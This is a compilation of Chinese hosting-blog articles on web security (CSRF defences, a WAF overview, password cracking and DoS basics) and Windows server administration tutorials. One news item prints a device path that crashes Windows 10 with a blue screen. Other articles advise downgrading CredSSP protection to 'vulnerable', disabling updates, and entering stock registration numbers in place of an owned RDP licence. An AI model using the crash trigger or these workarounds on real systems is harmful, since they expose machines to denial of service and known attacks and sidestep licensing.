在HTTP头中有Referer字段,他记录该HTTP请求的来源地址,如果跳转的网站与来源地址相符,那就是合法的,如果不符则可能是csrf攻击,拒绝该请求 2、在请求地址中添加token并验证 这种的话在请求的时候加一个token,值可以是随机产生的一段数字, token是存入数据库之后,后台返给客户端的,如果客户端再次登录的时候, 后台发现token没有,或者通过查询数据库不正确,那么就拒绝该请求 如果想防止一个账号避免在不同的机器上登录,那么我们就可以通过token来判断, 如果a机器登录后,我们就将用户的token从数据库清除,从新生成, 那么另外一台b机器在执行操作的时候,token就失效了,只能重新登录,这样就可以防止两台机器登同一账号 3、在HTTP头中自定义属性并验证 如果说通过每次请求的时候都得加token那么各个接口都得加很麻烦, 那么我们通过http的请求头来设置token 例如: $.ajax({ url: ‘/v1/api’, dataType: ‘json’, data: param, type:‘post’, headers: {‘Accept’:‘application/json’,‘Authorization’:tokenValue} success:function(res){ console.log(res) } }) 二、其它安全隐患 1.不能访问没有权限的文本内容,却能够访问图片资源 2.不恰当的错误信息抛出 数据库管理系统抛出的错误 后台应用抛出的程序错误 前端校验错误信息提示 3.开放重定向 4.密码破解 密码试错 穷举法 建立字典 对加密的密码进行破解 密码加密:密码+salt --> md5(散列函数)–> 保存散列值 破解方法: 穷举法、字典 调用相同散列函数处理候选密码得到散列值,与目标散列值比对。 彩虹表 明文和散列值构成的数据库表。能够提高效率。类似字典攻击。 拿到密钥 利用加密算法的漏洞 点击劫持(clickjacking) 又称界面伪装,诱导客户点击存在陷阱的按钮或者链接。在合法页面上设置透明的iframe页面。 DoS攻击(denial of service attack) 又称拒绝服务攻击。 集中发送合法请求,消耗服务器资源。 DDoS攻击(distributed denial of service attack):多台计算机发送的DoS攻击。一般利用已经中毒的计算机作为工具发送DoS。 网站劫持  使用 https 后门程序 分类: 开发阶段作为debug调用的后门程序 开发者为了自身利益植入的后门程序 攻击者设置的后门程序 #### web防火墙能提供什么服务 Web 防火墙(通常指 Web 应用防火墙 - WAF)的核心使命是为你的 Web 应用筑起一道坚固的数字防线。它像一位全天候的哨兵,站在你的网站和应用服务器之前,专门拦截那些针对 HTTP/HTTPS 流量的恶意攻击。它能提供的关键服务包括: 一、核心安全防护(抵御攻击) 防御常见 Web 攻击: SQL 注入: 阻止攻击者通过输入恶意 SQL 代码来窃取或破坏数据库。 跨站脚本: 阻止攻击者在用户浏览器中注入恶意脚本,窃取会话信息或进行钓鱼。 跨站请求伪造: 阻止攻击者诱骗用户在不知情的情况下执行非自愿操作。 远程文件包含 / 本地文件包含: 阻止攻击者包含并执行远程或服务器本地的恶意文件。 命令注入: 阻止攻击者在服务器上执行任意操作系统命令。 路径遍历: 阻止攻击者访问 Web 根目录之外的文件。 HTTP 协议违规攻击: 防御利用 HTTP 协议本身缺陷的攻击。 扫描器/爬虫探测: 识别并阻止恶意扫描工具对网站漏洞的探测。 核心规则集防护: 基于 OWASP ModSecurity 核心规则集等通用规则提供基础防护。 0day 漏洞缓解: 一些高级 WAF 能提供针对新发现漏洞的虚拟补丁,在官方补丁发布前提供防护。 缓解应用层 DDoS 攻击: CC 攻击: 识别并阻断大量模拟合法用户请求(如刷新页面、提交表单)的恶意连接,耗尽服务器资源。 HTTP 洪水攻击: 抵御大量无效或恶意的 HTTP/HTTPS 请求淹没服务器的攻击。 慢速攻击: 识别并阻断故意保持连接缓慢发送数据的攻击(如 Slowloris)。 二、访问控制与风险管理 IP/地理区域访问控制: 黑白名单: 允许或阻止特定 IP 地址、IP 段或整个国家/地区的访问。 基于信誉库: 自动阻止来自已知恶意 IP 地址(如僵尸网络)的访问。 API 安全: API 端点防护: 保护 API 免受注入、参数篡改、数据泄露等攻击。 API 滥用防护: 检测并阻止异常的 API 调用模式、凭证填充攻击、过高的调用频率。 API Schema 校验: 验证 API 请求是否符合预定义的结构和数据类型。 Bot 管理: 区分好坏 Bot: 识别搜索引擎爬虫、合作伙伴集成等合法 Bot,并放行。 阻止恶意 Bot: 阻止自动化攻击工具、内容抓取、撞库攻击、虚假注册、票务抢购等恶意 Bot 活动。 人机验证: 对可疑流量实施验证码等验证手段。 三、数据保护与合规性 数据防泄露: 敏感信息屏蔽: 检测并阻止在 HTTP 响应中意外泄露的敏感信息(如信用卡号、身份证号、社保号、数据库错误信息)。 数据脱敏: 在日志或报告中隐藏敏感数据。 合规性支持: 满足监管要求: 帮助满足 PCI DSS(支付卡行业数据安全标准)、GDPR(通用数据保护条例)、HIPAA(健康保险流通与责任法案)等法规对 Web 应用安全的要求,提供审计证据。 四、性能优化与可见性 性能优化 (部分 WAF 提供): 内容缓存: 缓存静态内容,减轻源站负载,加速用户访问。 TCP 连接优化: 优化与客户端的连接管理。 压缩: 对响应内容进行压缩,减少带宽占用。 日志记录与审计: 详细访问日志: 记录所有经过 WAF 的请求和响应详情(可配置),包括被拦截的请求。 安全事件日志: 记录检测到的攻击事件、触发的规则、攻击类型、来源 IP 等。 报告与分析: 提供安全报告、威胁可视化仪表盘,帮助分析攻击趋势、识别薄弱环节。 配置管理与灵活部署: 多种部署模式: 支持云端(SaaS)、本地设备、反向代理、内联/旁路部署等多种方式。 策略管理: 提供灵活的策略配置、自定义规则编写、规则集更新。 学习模式: 部分 WAF 支持学习流量模式,辅助生成更精准的防护规则。 总结来说,Web 应用防火墙提供的关键服务价值 保护业务安全: 防止网站被篡改、数据被窃取、服务被中断,保障业务连续性。 保护用户安全: 防止用户信息泄露、账户被盗用、遭受钓鱼欺诈。 满足合规要求: 满足行业和法规的安全审计要求。 提升运维效率: 集中管理安全策略,提供攻击可视化,快速响应威胁。 优化性能 (部分): 通过缓存、压缩等技术提升用户体验。 降低风险成本: 预防因安全事件导致的巨额经济损失和声誉损失。 增强信任度: 向客户和合作伙伴展示对安全的重视。 选择 WAF 时,务必根据你的具体应用架构、业务需求、安全风险状况以及预算来决定哪种部署模式和功能组合最适合你。 它不再只是一个可选项,而是现代 Web 应用不可或缺的安全基石。 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 #### WenprisePinyinSlug:把wordpress固定链接转成拼音的插件 wordpress的固定链接一般都是做成伪静态的,而很多网站都是把链接设置成ID数字,考虑到网站内容不多,而且SEO的因素,主机吧使用的是中文转换拼音的方式。 还别说SEO效果还挺好,之前用的是一个3年前最后一次更新的插件SO Pinyin Slugs,不过这插件很多年没更新了,而且没办法限制文字长度,导致了很多时候主机吧的文章url地址非常的长。 因此主机吧趁着更换模板之际把这个插件也换了,找了很久都没有找到合适的,也换过Pinyin Permalink这个插件试了下,这个插件是7年前的了,根本用不了。 后来找到了Wenprise Pinyin Slug这个插件,一用之后非常好用,而且和之前的SO Pinyin Slugs很像,但Wenprise Pinyin Slug是支持限制文字长度的,这也是主机吧决定用下来的原因,而且这个插件是最新更新的,更新不到一个月,对于最新版本的 wordpress是完全支持的。 插件的主要功能 转换文章别名为拼音,支持快速编辑时转换 转换分类目录、标签或自定义分类法别名为拼音,支持快速编辑 当上面内容内英文,或手动设置了中文别名时,保持原样。 转换中文图片名为拼音 支持自定义转换方式为全拼或第一个字母 支持设置拼音之间的间隔 支持截取转换后的拼音长度 下载地址:https://zhujib.com/download/wenprisepinyinslugchajian.html #### Win10 Edge浏览器被爆安全漏洞 隐私安全越来越多地被提上台面,尤其是在互联网日益发达的当下。 安全研究人员Matt Weeks日前爆料称,Windows10 自带的Edge浏览器会发送用户几乎所有浏览网页的URL地址给微软后端服务器,同时还有明文的安全账户识别ID。 之所以出现上述情况是Edge自带的SmartScreen筛选器功能,微软强调其工作机制就是比对网址数据,以便在访问高危网站时提醒用户。 不过,Weeks表示,微软显然有更好的替代方法。以谷歌Chrome、Firefox、Safari浏览器为例,它们并不会传送URL地址,而是那 4 比特的URL头部hash和恶意名单中的hash做比对,从而较好地保护用户隐私。 微软尚未表明是否会做出相应改进。 #### Win10出现严重漏洞导致蓝屏 360、火绒均已上线漏洞补丁 1月21日 消息:近日,win10系统出现严重蓝屏漏洞,该漏洞将导致电脑系统崩溃并显示蓝屏波及全球数亿用户。 据了解,本次漏洞蓝屏主要出现在Windows101709及以上系统。 当用户使用Chrome浏览器访问路径:\\.\globalroot\device\condrv\kernelconnect时,系统会立即崩溃并显示蓝屏。此外,安全人员发现,通过其他方式访问该路径,也会触发Win10系统BSOD(User权限也会触发)。 该漏洞很可能被黑客用于拒绝服务攻击,从而给用户造成严重损失。目前微软还未针对该漏洞发布任何公告和补丁。 不过,火绒、360均针对该漏洞上线了漏洞补丁并实时查杀病毒,帮助用户避免遭受攻击。 #### win10如何更换114DNS 经常有用户反馈访问网站出现“DNS_PROBE_FINISHED_NXDOMAIN” 原因一般有两个, 1 网站解析未生效  2 如果偶尔性的话,那可能本地DNS故障了,那么我们就需要更换一个稳定的DNS,比如144DNS 今天我们来教你win10如何修改114DNS 方法/步骤 1:右击此电脑--属性,如下图所示 2:我们选择控制面板进入系统与安全,如下图所示 3:进入网络和Internet   4:查看网络状态与任务 5:点击进入连接网络 6:点击属性 7:找到Internet协义版本4,点击进入 8:在使用下面的DNS服务器地址,输入114.114.114.114与114.114.115.115 ,然后确认即可。   #### win10远程VPS云服务器桌面出现身份验证错误。要求的函数不受支持解决方案 最近一客户反馈远程不了云服务器,提示:安装身份验证错误。要求的函数不受支持。主机吧一开始以为是服务器出问题了,后来我本地可以连接,而客户不行,查了下网络才知道原来是win10的最新补丁导致的。主机吧也搜罗了一些教程,希望可以帮助大家解决问题。 如果你本地电脑是windows版本10.0.17134,安装最新补丁后无法远程windows server 2008、2013、2016服务器报错信息如下:远程桌面,出现身份验证错误,要求的函数不受支持  可能是由于CredSSP加密Oracle修正。 微软给出解决方案: https://support.microsoft.com/zh-cn/help/4093492/credssp-updates-for-cve-2018-0886-march-13-2018 2018 年 5 月 8 日 将默认设置从“易受攻击”更改为“缓解”的更新。 相关的 Microsoft 知识库编号已在 CVE-2018-0886 中列出。 解决办法如下(强烈推荐方案一)。 “身份验证错误,要求的函数不受支持”解决方案一(强烈推荐): 本地电脑和服务器端都同时安装更新补丁,更新以后重启服务器。 补丁单独下载地址: win 7、win2008 R2:KB4103718 win 8、win2012:KB4103730 win10、win2016 :KB4103721 注意下载对应版本补丁进行安装。   “身份验证错误,要求的函数不受支持”解决方案二: 注意:如果本地电脑没有该项,强烈建议按方法一本地安装补丁;如果本地电脑有此选项,强烈建议按方法一对服务器安装补丁。 某些特殊情况服务器不能更新最新补丁,可按照以下方法设置本地电脑之后远程登录: 在运行里面输入gpedit.msc打开策略 找到该路径:“计算机配置”->“管理模板”->“系统”->“凭据分配” 在右边设置名称找到 “加密 Oracle 修正”,将保护级别更改为“易受攻击”。 修改以后在运行里面输入gpupdate更新策略。 windows专业版以上: 打开组策略编辑器 双击“加密Oracle修正” 修改如下 应用确定完之后就可以进行远程连接 “身份验证错误,要求的函数不受支持”解决方案三:适用于windows 家庭版 windows 10家庭版则需要把这个更新卸载掉 打开控制面板 选择卸载程序   选择查看已安装的更新 搜索卸载KB4103727和KB4131372两个补丁包即可。 补丁包需要逐个卸载,等第一个卸载完再卸载第二个,两个都卸载完毕后,重启电脑。你又可以进行远程桌面连接了。 #### win2003服务器安装ssl证书 启用HTTPS地址 现在到处是劫持网址加广告的,现在通过https访问,就不用担心了,比较适合对安全级别要求高的网站,当然老站更需要开启https了。 无废话图文教程,教你一步一步搭建CA服务器,以及让IIS启用HTTPS服务。 一、架设证书服务器(CA服务) 1.在系统控制面板中,找到“添加/删除程序”,点击左侧的“添加/删除windows组件”,在列表中找到“证书服务”,安装之。   2.CA类型,这里有四种选择,这里以“独立根CA”为介绍。   3.CA识别信息,这里可以为你的CA服务器起个名字。   4.证书数据库设置,用于保存证书的相关数据库和日志文件,这个默认就行了。   5.安装完成后,在 控制面板 - 管理工具 中就可以打开 证书颁发机构,这个工具是用于审核证书用的,后面会提到。   6.安装完成后,在IIS中,还会增加三个相关的目录,其中的“CertSrv”就是证书申请的页面了。 7.打开相应的页面,可以看到如下图,至此,CA服务器基本已架设完成。   二、让IIS开启HTTPS(SSL)功能 1.在IIS中的“默认网站”右键,选择“属性”,可看到网站属性,点击“目录安全性”标签页,点击“服务器证书”按钮。   2.选择“新建证书”,下一步   3.选择“现在准备证书请求,但稍后发送”,下一步   4.单位信息,这里需要自己填写,至于写什么,自己可以决定,这些信息会在证书中显示。   5.名称和安全性,名称默认是IIS网站的名称,密钥长度默认为1024位,下一步   6.站点公用名称,这个默认是服务器的机器名,请注意,如果IIS是对象服务的,此处必须填写对应的域名。   7.地理信息,随便填吧,下一步   8.证书请求文件名,默认是保存在C盘下,打开后会看到如下一串加密的字符串。   9.先将证书的加密串复制下来,前往前面提到的证书申请的页面,选择“申请一个证书”   10.证书的申请方式,选择“高级证书申请”   11.选择“使用base64……”   12.将证书串填入文本框中,并“提交”,至此,完成了证书的申请。(先别急着关IE,点右上的“主页”等着吧)   13.回到证书颁发机构工具中,选择左边的“挂起的申请”,可以看到里面有一条申请记录,申请ID就是你刚才申请的ID。 选中记录,右键 - 所有任务 - 颁发,这样即可以颁发证书了。 点击“颁发的证书”就可以看到刚刚颁发的证书了。     14,再回到证书申请页面,选择“查看挂起的证书申请的状态”   15.在这个页面可以看到你之前申请的所有证书,多个的话有多条链接),点击其中一条。   16.在这里,如果已经颁发的证书,就可以看到证书下载页面了,一般选择Base64编码,下载证书。 下载证书链的话,可以把根CA的证书也一起下载。   17.回到IIS,目录安全性的那个页面,还是点击“服务器证书”,此时界面已改变,选择“处理挂起的请求并安装证书”,下一步   18.选择刚下载的证书,下一步   19.填写SSL使用的端口,一般默认是443,不需要修改。至此,便完成了证书的申请。   20.如果要强制使用HTTPS访问网站的话,在“目录安全性”标签页中,点击“编辑”按钮。   21.钩选”要求安全通道(SSL)”一项   22,此时,我们再刷新一下证书申请页面,就可以看到403.4的错误页面了,因为我们强制要求使用HTTPS来访问网站了。 注意:如果不是整个网站要求使用HTTPS的话,也可以针对一个虚拟目录进行设置,方法同上。   23.修改为HTTPS访问后,会提示安全警报,这里提示证书名与站点名不匹配,那是因为我们使用localhost来访问了。 还记得上面申请证书时,提到的公用名称吗?就是这个了,当时我们填的是机器名,所以和localhost当然不匹配。 这也是为什么如果IIS有对外的话,要填域名的原因了,否则就会提示此安全警报了。 此处只需要将地址修改为:https://dier-vm03/certsrv,就不会提示安全警报了。 24.扩展一下,不是每个用户都是懂技术的,当普通用户看到403.4错误,要求就不懂得加个S就能访问,那肿么办? 其实很简单,在“自定义错误”标签页中,找到403.4指向的页面文件的位置,然后进去打开来。加一段脚本就搞定了。 其实就是利用javascript判断是不是使用http的,如果是就自动跳转到https ? 1 2 <script type="text/javascript"> var url = window.location.href;if(url.indexOf("http:") > -1) window.location.href = url.replace("http:","https:");</script> 好了,全部搞定,https是未来的趋势,可以预见以后会越来越多https网站,而http也将退出历史舞台,现在国外https网址已经很普及了,外国网站有80%的网站启用https,而浏览器更是有些直接屏蔽掉http,所以网址https势在必行 #### Win7系统下Linux虚拟机安装教程 本篇经验,在WIN7下搭建了LINUX虚拟机。是以UBUNTU为例,不过您搭建其他版本的LINUX系统,比如CENTOS等,也都适用。 安装必备文件: 1)ubuntu镜像文件,.iso文件(ubuntu-16.10-desktop-amd64); 2)VMware安装文件(VMware Workstation 官方中文版 64位12.5.2)。 首先安装VMware,在WIN7上搭建一个虚拟环境。然后在VMware的基础上,通过ISO镜像文件,安装LINUX操作系统。 一 安装VMware 1.选择安装路径,为了避免以后出现莫名其妙的意外,请不要有中文和空格。 2.一路next,等待安装完毕。密钥根据版本百度去搜。 二.搭建LINUX虚拟机 1. 创建虚拟机 2.选择典型安装 3.选择“安装程序光盘映象文件(ISO)”这个选项。如果是通过光盘安装,则选择"安装程序光盘"。 4.设置用户名、密码 5.安装位置,最好不要有中文和空格 6.磁盘大小,根据需要设置,一般默认即可。 7. 安装完成。输入之前设定的用户名和密码,就可以登录了。 ubuntu 安装时: 问题:downloading language packs ,如果网络不好,持续能达到几个小时 解决办法:切断网络连接,安装完后,还可以再安装 #### Windows 10更新导致“重置此电脑”失效 微软给出解决办法 Windows10如今已经安装在超过10亿台设备上,所以难免遇到各种各样的问题,从蓝屏到刚刚出现的一个影响重置电脑的问题。 如果电脑无法正常运行,重置电脑可能会解决问题。系统重置时,你可以选择保留个人文件,然后重新安装Windows。 微软证实,Windows10最近的更新导致了内置的“重置此电脑”功能出现了问题,一个新的Bug导致Windows10无法重置电脑。 幸运的时,微软表示他们已经知晓此问题,并且提供了一个暂时的解决方法。 具体步骤: 1.打开Windows搜索。 2.搜索“命令提示符” 3.右键点击“命令提示符”,选择“以管理员身份运行” 4.在命令提示符中,输入以下命令:dism /online /cleanup-image /restorehealth 5.重新启动系统 6.打开设置>更新和安全>恢复,然后点击“重置此电脑”下的开始。 #### Windows 2008 防火墙给IP加黑白名单设置图文教程 常用客户想给反馈网站被某IP攻击或者某IP刷流量,想限制这个IP访问网站服务器,也有的因为某IP被服务器防火墙拦截导致访问不了网站,那么我们可以配置windows2008自带的防火墙进行黑白名单设置,以达到限制IP访问或允许IP访问的目地。 防火墙具体配置八个步骤完成。 第一步:点击“新建规则” 第二步:选择“自定义” 第三步:不用选择,默认“所有程序” 第四步:默认,下一步 第五步:自定义应用中添加指定的IP(需要过滤的IP) 第六步:选择“阻止链接”,同理“允许连接”为增加IP白名单,下一步 第七步:选择需要生效的域,一般默认就好 第八步:填写规则名称及注释,完成生效配置 #### Windows IIS7服务器如何设置404错误页 404错误页面的设置,不仅仅可以提高用户体验度,从SEO方面考虑,也是非常重要的。IIS7设置404页非常简单的,这里主机吧给大家介绍下如何设置。 进入windows 2008服务器,打开IIS Manager,点击需要设置404错误页面的网站。 在IIS中随便找到一个网站,然后点击右侧的【错误页】,下图中已经用箭头指出。 选中【错误页】,用鼠标右键选择打开功能,我们会看到404页面加密的路径,删除这条404加密路径。 点击iis7.5右上角的添加,添加一个404页面,我命名为404.html。 打开自定义错误页面,状态代码写404,选择在此网站上执行(提前放一个404.html的文件),选好后点击确定。 点击之后,我们会看到添加的错误页,这个页面没有加密。 此刻我们在网站的根目录,会发现多出一个web.config文件。 找到web.config文件(在网站根目录下), 代码如下: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <httpErrors errorMode="DetailedLocalOnly"> <remove statusCode="404" /> <error statusCode="404" path="/404.html" responseMode="ExecuteURL" /> </httpErrors> </system.webServer> </configuration> 如果存在 <httpErrors errorMode="Detailed" />项,而虚拟主机控制面板又可以自定义404,只要把errorMode的值修改为Custom即可。 在这里说明下: errorMode有三个值,分别为Custom、DetailedLocalOnly、Detailed,意思为对用户与服务器端始终显示自定义页面、只能服务器端显示详细出错信息、对用户与服务器端始终显示详细出错信息。 一般情况下只要选择Custom即可。 #### windows IIS7环境如何实现ECShop伪静态? 1、安装iis支持的伪静态组件,rewrite_x64_zh-CN.msi(可百度搜索下载)安装后在站点里面直接点击CUR项目选择导入选址文件文件导入即; 2、ECShop静态化文件写入到Web.config文件; 3、将下列ECShop静态化代码添加至红色位置,确保添加正确; 4、伪静态的文件,亲测有效; 5、登录ECShop后台,开启静态化; 6、测试成功。 #### windows IIS7网站环境上部署运行PHP程序 最近一客户找主机买云服务器的时候说网站PHP运行不了,主机吧经过查看原来是他的IIS里并没有添加PHP扩展,这里主机吧给大家找了个教程,希望可以帮助大家如何处理IIS无法正常运行PHP的情况。 第一步:选择和下载PHP发行包 根据所用 web 服务器选择合适的版本,PHP下载地址(可阅读官网下载页中的侧栏Which version do I choose?) 我的阿里云服务器系统是64位,用的是IIS,所以选择PHP 5.6 (5.6.31)VC11 x64 Non Thread Safe PHP官网上对PHP的安装包目录有详细的介绍,点开链接即可查看; 第二步:修改PHP.ini文件 extension_dir = <指向扩展库目录的路径> - extension_dir 需要指向存放 PHP 扩展库文件的目录。可以是绝对路径(如 “C:\PHP\ext”)或相对路径(如 “.\ext”)。在 php.ini 文件中要加载的扩展库都必须在 extension_dir 所指定的目录之中。 extension = xxxxx.dll - 对每个需要激活的扩展,都需要一行相应的 “extension=” 语句来说明 PHP 启动时加载 extension_dir 目录下的哪些扩展。 log_errors = On - PHP 有错误日志的功能可以将错误报告发送到一个文件中,或者系统服务中(例如系统日志),与下面的 error_log 指令配合工作。在 IIS 下运行时,log_errors 应被激活,并且配合有效的 error_log。 error_log = <指向错误日志文件的路径> - error_log 需要指向一个具有绝对或相对路径的文件名用于记录 PHP 的错误日志。Web 服务器需要对此文件有可写权限。最常用的位置是各种临时目录,例如 “C:\inetpub\temp\php-errors.log”。 cgi.force_redirect = 0 - 在 IIS 下运行时需要关闭此项指令。这是个在许多其它 web 服务器中都需要激活的目录安全功能,但是在 IIS 下如果激活则会导致 PHP 引擎在 Windows 中出错。 cgi.fix_pathinfo = 1 - 此指令可以允许 PHP 遵从 CGI 规则访问真实路径信息。IIS 的 FastCGI 实现需要激活此指令。 fastcgi.impersonate = 1 - IIS 下的 FastCGI 支持模拟呼叫用户方安全令牌的能力。这使得 IIS 可以定义请求方的安全上下文。 fastcgi.logging = 0 - FastCGI 日志在 IIS 下应被关闭。如果激活,则任何类的任何消息都被 FastCGI 视为错误条件从而导致 IIS 产生 HTTP 500 错误。 session存储路径,如:session.save_path = “d:\server\web\session” (这里写一个保存session的路径) 配置完成后,将php.ini拷贝一份放到c:\windows下。在win7的IIS7上配置php时,并不需要把php.ini和相关文件拷到系统目录下了。 第三步:设置IIS(确保iis上安装了cgi模块) 按以下示例在 php.ini 文件中配置 针对 CGI- 和 FastCGI- 的指令: fastcgi.impersonate = 1 fastcgi.logging = 0 cgi.fix_pathinfo=1 cgi.force_redirect = 0 打开IIS,选中站点,打开处理程序映射界面。 在右边“操作”面板中点击“添加模块映射…”; #### Windows server 2008 R2服务器设置自动更新开启与关闭 经常有用户反馈云服务器总是半夜自动重启,其实并不是服务器问题,而是你的服务器操作系统设置了每天晚上自动检测更新导致。如果不需要的自动更新,我们可以把他关掉,下面主机吧教大家设置自动更新开启与关闭。 一、选择“开始”--“控制面板” 二、再选择“系统和安全” 三、再选择“windows update” 四、如果需要关闭自动更新,就选择“从不检查更新” 五、如果需要开启自动更新,就选在“自动更新”     #### Windows server 2008 R2远程桌面修改方法3389端口号 windows server的服务器远程桌面默认端口号是3389,在工作中经常使用远程桌面连接服务器,但是这也是常常被黑客利用的端口号,但是如何修改掉默认端口,预防被黑客利用呢? 可以如下操作配置: 很多人在使用windows操作系统的时候,由于修改端口的方法错误,导致自己不能远程操作服务器,给自己带来了麻烦,在这里,我给大家简单的演示一下正确修改远程端口的方法。 ------------------------------- ctrl+r(快捷键)-输入regedit,进入注册表编辑,按下面的路径进入修改端口的地方 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp 找到下面的 "PortNumber",用十进制方式显示,默认为3389,改为任意可用端口。演示:(7788) 请注意: 在这里修改过了以后,若还没有修改成功,注册表文件的另外一个位置也必须做相应的修改,路径如下 : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp 找到下面的 "PortNumber",用十进制方式显示,并做出相应的修改。 到这里,你已经成功修改完注册表,重新启动计算机,你就可以通过新的远程端口号连接了。 另外我跟大家分享一块软件一键修改远程桌面连接端口。   获取工具方法:步联端口修改器。   #### Windows Server 2012 开启关闭防火墙方法 Windows Server服务器系统是比较流行的服务器操作系统,其主要针对网络服务器设计的,可以说非常符合建站等服务,很多大型公司都用。像Windows Server2003系统很多公司就用了很多年,不过现在这系统太老了,而且微软公司已经停止维护了。而现在最新的版本已经到Windows Server 2016了,2016对于站长来说太新,我们推荐用Windows Server 2012的。Windows Server 2012自带的防火墙对服务器安全非常有帮助的,比如对IP进行黑白名单,端口限制开放,限制连接协议等。今年我们来说下如何开启关闭Windows Server 2012自带的防火墙。方法/步骤击右下角窗口图标,如图点击管理工具,如图点击高级安全windows防火墙,如图点击windows防火墙属性,再在防火墙状态选择关闭/启用选项即可,如图以上就是Windows Server 2012关于防火墙开启关闭的方法了,希望可以帮到大家。 #### Windows Server 2012 系统实例由于ECN功能导致高防IP 高防CDN建立连接慢 问题描述 使用Windows Server 2012系统实例部署业务后,由于ECN功能导致系统建立连接慢。 问题原因 Windows Server 2012系统实例引入的新功能ECN(Explicit Congestion Notification),该功能会根据RFC规定来减少网络包重传的机器,但是由于国内某些ISP封杀此类的SYN包,导致目标机器无法收到带有ECN标志的SYN包,Windows实例在发送2次ECN包没有得到响应后(第一次重传3秒,第二次重传6秒),会采用没有ECN标志位的SYN包,之后可以连接成功。 解决方案 使用管理员用户登录云服务器。 依次选择开始 > 运行,输入cmd,单击确定,打开命令行窗口。 执行以下命令,确认ECN功能值为enabled。 netsh interface tcp show global 执行以下命令,关闭ECN功能。 netsh int tcp set global ecncapability=disabled 再次执行第3步的命令,确认ECN功能已经关闭。 netsh interface tcp show global 系统显示类似如下,表示ECN已经关闭。 #### windows server 2012/2016服务器设置多人同时远程桌面方法 这篇文章主要介绍了windows server 2012/2016 设置多用户远程桌面设置方法,服务器设置多用户同时远程桌面,可以提高访问效率,避免人多抢登服务器,需要的朋友可以参考下 服务器设置多用户同时远程桌面,可以提高访问效率,避免人多抢登服务器。 1. 首先需要先安装远程桌面服务 配置组策略,运行框输入gpedit.msc,打开计算机配置–>管理模板—>windows组件—>然后在右边的菜单中选择远程桌面服务;双击打开。双击远程桌面会话主机->连接,点击限制连接的数量,设置如下。 这样设置就完成了。亲测成功。 这样设置远程多用户只有120天期限,要破解120天限制,还需要配置远程桌面授权。 能成功的前提:系统是激活的。 2、 web申请激活码 1) 管理工具—远程桌面服务—远程桌面授权管理器,选择未激活的服务器,选择”属性”,请记下对话框中出现的产品ID,我们要用这20位的ID号到网上注册例如:00184-50100-21572-AT706 注意:如果终端服务器授权中没有服务器,请选择连接,然后输入本机服务器IP地址。 必需信息,如图下填写: 2) 打开Internet Explorer浏览器,在地址栏中输入https://activate.microsoft.com这个地址,此时是英文界面。选择GO 3) 确保已选中”启用许可证服务器”项,再单击”下一步”按钮。 4) 在随后要求提供的信息界面中,”产品ID”处输入刚才抄下的那个20位数字,再填写刚才步骤1中必需信息,然后再选”下一步”继续。 5) 可以得到”已成功处理您的许可证服务器启动申请。你的许可证ID是:…”,又是一个需要抄下的分为七段的35位数,里面包含有数字也有大写的英文字母;并且还会问你”需要此时获取客户机许可证吗?”选择”是” 许可服务器ID:CCB9Q-Y44D6-BR2HD-9H4VM-YPXMM-KF2KJ-RJ473 6) 如果没有许可证,那么许可证程序选择“企业协议”,确定您的信息后,便可继续”下一步”; 7) “产品类型”一项应为”Windows 2003终端服务客户端访问许可证”;”数量”为你欲连接的最大用户数(比如为”500”);在”注册号码”中输入你从微软获得的那个七位数(如果自己没有许可证,那么就输入6565792,4954438,6879321或者5296992),再”下一步”; 注意:建议选择Windwos Server 2012远程桌面服务器每用户访问许可。 8) 下一步 9) 记录前面的35位数的”许可证服务器ID”,一个是现在才取得的另一个七段共35位数的”许可证密钥包ID”。 许可密钥ID:RBG28-9884M-GXC4V-WKXGJ-8QPXG-FG8YP-9RV8Q 10) 选择结束 3、 激活终端服务 1) 管理工具—远程桌面服务—远程桌面授权管理器,选择服务器名称后点击右键,将”属性”中的”安装方法”设为”Web浏览器”; 2) 再选择服务器,点击右键,选择”激活许可”; 3) 下一步 4) 选择WEB 5) 输入许可服务器ID:CCB9Q-Y44D6-BR2HD-9H4VM-YPXMM-KF2KJ-RJ473 6) 选择立即启动许可安装向导,下一步 7) 下一步 8) 输入许可密钥ID:RBG28-9884M-GXC4V-WKXGJ-8QPXG-FG8YP-9RV8Q 9) 点击完成 4、 配置远程桌面会话主机授权服务器 1) 管理工具—远程桌面服务—RD授权诊断程序,查看当前服务器为没有授权 2) 运行—>gpedit.msc->计算机配置—管理模板—windows组件—远程桌面服务—远程桌面会话主机—-授权, 找到 “使用指定的远程桌面许可服务器”,设置为启用,并在“要使用的许可证服务器”中,设置当前服务器的IP或者主机名。 9)运行—>gpedit.msc->计算机配置—管理模板—windows组件—终端服务 找到 “限制连接数量”,设置为Disable,即禁用或者未配置。也可以设置具体数量,如图: 5、配置远程桌面会话主机授权模式 3) 管理工具—远程桌面服务—RD授权诊断程序,查看当前服务器授权为0 4) 运行—>gpedit.msc->计算机配置—管理模板—windows组件—远程桌面服务—远程桌面会话主机—-授权, 找到 “设置远程桌面授权模式”,设置为启用,并在“指定RD 会话主机服务器授权模式”中,选择“按用户”。 5) 重新打开RD授权诊断程序 6、配置远程桌面会话主机连接 1) 运行—>gpedit.msc->计算机配置—管理模板—windows组件—远程桌面服务—远程桌面会话主机—-连接,可以在“限制连接的数量”中设置最大连接数量(默认无限制)。如图 2) 设置一个用户是否可以使用多个远程桌面连接。选择“将远程桌面服务限制到单独的远程桌面会话”,这里必须设置禁用,否则一个用户只能连接一个远程桌面。 #### Windows Server 2016服务器如何开启关闭防火墙 Windows Server 2016是微软于2016年10月13日正式发布的最新服务器操作系统。系统自带的防火墙非常适合网站建设的朋友使用,用得好的话,Windows Server 2016具体一定的防护攻击能力。当然啦也有一些朋友不喜欢用windows自带的防火墙功能,这里主机吧教大家如何开启关闭win2016的防火墙系统。首先点击右下角窗口图标,如图点击进入控制面板,如图点击进入windows 防火墙 功能,如图点击左右启用或关闭windows 防火墙,如图  点击启用专用网络设置和公用网络设置 windows防火墙,反之关闭点击关闭防火墙,然后点确认,如图这样Windows Server 2016服务器开启关闭防火墙流程就完成了,希望可以帮助大家,欢迎关注主机吧! #### windows Server 2016系统云服务器如何挂载磁盘 最近在玩windows服务器系统,好久没有弄过windows系统了,就挺懵逼的,连基本的挂载磁盘都不知道怎么弄了 。 